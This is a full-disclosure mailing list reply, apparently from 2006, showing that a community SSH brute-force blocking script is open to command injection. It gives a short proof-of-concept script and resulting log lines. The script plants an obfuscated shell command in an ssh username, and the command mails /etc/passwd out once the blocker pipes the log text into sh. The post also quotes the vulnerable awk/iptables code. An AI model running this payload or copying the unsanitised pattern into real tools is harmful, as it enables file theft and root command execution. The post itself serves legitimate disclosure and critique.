Re: [Full-disclosure] SSH brute force blocking tool

On Tue, Nov 28, 2006 at 09:33:03AM -0500, J. Oquendo wrote:
Thierry Zoller wrote:
Dear All,

You are arguing over hypothesises where facts could rule. PLEASE someone
just setup the script on a test environment and present us your
results. Heck, it's not that we are discussing Metaproblems here,
these are computers.

Just install and make a PoC and enhance security for all
for the sake of it. Thanks :)

Out of interest, I did just that. It turns out to be quite tricky to get
arbitrary shell commands in there as (at least on my system), ssh will
stop logging usernames after certain characters are encountered, such as
'/' or ':'.

However, it is certainly possible. Here is an example.

#!/bin/sh
command='$(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure@xxxxxxxxxxxxxxxxx)<${x}etc${x}passwd)'
ssh -o "BatchMode yes" "a a $command"@$1

Which produces log entries like this:

Nov 28 15:14:15 insomniac sshd[5897]: pam_succeed_if(sshd:auth): error retrieving information about user a a $(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure@xxxxxxxxxxxxxxxxx)<${x}etc${x}passwd)
Nov 28 15:14:15 insomniac sshd[5897]: Failed password for invalid user a a $(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure@xxxxxxxxxxxxxxxxx)<${x}etc${x}passwd) from 127.0.0.1 port 47403 ssh2

Note that the 13th field both contains a dot and is entirely controlled
by me. This string is placed in /etc/hosts.deny by the script after
executed by cron.

The $1 in the awk script below is the entire string, which is piped
unsanitised into /bin/sh:

awk '!/#/ && /\./ && !a[$0]++
{print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22
-j REJECT"}' /etc/hosts.deny |\
awk '/iptables/ && !/#/ && !/-s -i/'|sh

The results are obvious.

The problem with the whole thread was "well someone could do XXX" Sure
they could... Anyone could... My point was someone shooting a message
back to the list stating "Your program is a backdoor".

Yes, I wrongly assumed you had malicious intentions, but are actually
just an inexperienced programmer. I apologise for this.

It never was and
it never will be. Can someone modify it on their own and make it a
backdoor? Sure. Can someone inject something into the columns I was
parsing, possible. Anything is possible. Since then I re-wrote arguments
people were griping about:

Yes, although your code is still very fragile and relies on unique
strings appearing in the logs. I certainly wouldnt want all that extra
code running as root on untrusted input.

ifaddr=`ifconfig -a|awk '/inet/ && !/inet6/ && !/127.0/ &&
!/192.168/{print $2}'|sed 's/addr\://g'`

function IPT {

grep -E
'(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[1-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3}'
/etc/hosts.deny|\
awk '!/#/&&/\./&&!a[$0]++
{print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22
-j REJECT"}'|\
awk '/iptables/&&!/#/&&!/-s -i/'|sh

}

You also still havnt solved the problem of an attacker adding arbitrary
addressed to hosts.deny.

The complaint was "anyone can insert $foo into the thirteenth column"...
Try it instead of mouthing off about it. "Someone can possible inject
tartar sauce into a sealed jar" Is it possible, sure it probably is,
show me though instead of yapping off. Someone else griped, "someone can
craftily insert your own address into an IP table." Look if someone is
THAT stupid of an admin to not test things first, modify it to their
needs, and gets themselves locked out of their own machine, they have no
business on that machine. Period.

J, what would testing achieve? An attacker simply needs to know an
important address to block. Your code is very naive and fragile, and
should be avoided.

Thanks, Tavis.

--
-------------------------------------
taviso@xxxxxxxxxxxxxxxx | finger me for my pgp key.
-------------------------------------------------------

Attachment: pgpMszJXRScMU.pgp
Description: PGP signature

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Relevant Pages

  • Re: How to rewrite with awk?
    ... > I'm unfamiliar with tools such as sed & awk. ... Extract the string that matches a RE. ... This script will not only expand all the lines that say "include ... file) and not resetting ARGV(the tmp file), it then lets awk do any ...
    (comp.unix.shell)
  • Re: Slow string
    ... I see virtually no difference in execution time for the code you posted when using cscript versus using wscript; to confirm, I bracketed the code with an initial ... Are you actually entering the script name into a console window? ... You can use the exact same line for every wrapper script - and that includes wsf and js scripts; all you need to do is change the final "vbs" to "wsf" or "js" as appropriate. ... If you build a large string by small concatenations, the performance degrades geometrically - so does array resizing, because they both use the same nasty technique inherited from VB1 of copying the entire data structure to a new structure with the added element. ...
    (microsoft.public.scripting.vbscript)
  • Re: cross site scripint and post form
    ... cross site scripint and post form ... Its easier with the GET method because, as you have noticed, the attacker ... script tags out of the input with your client code -The attacker can still ...
    (Security-Basics)
  • Re: Function that returns date of file.
    ... string after the date/time when it is used by itself. ... Is that your entire script? ... I make an IF statement that required the 'equals equals'. ... designed database your job will be all that much harder. ...
    (alt.php)
  • Re: Strange Attack On A Webserver I Work On
    ... My guess is that this guy definitely was a script kiddie. ... If you Google for the e-mail addresses that appear in the flooder ... >> The attacker replaced all ...
    (Focus-Linux)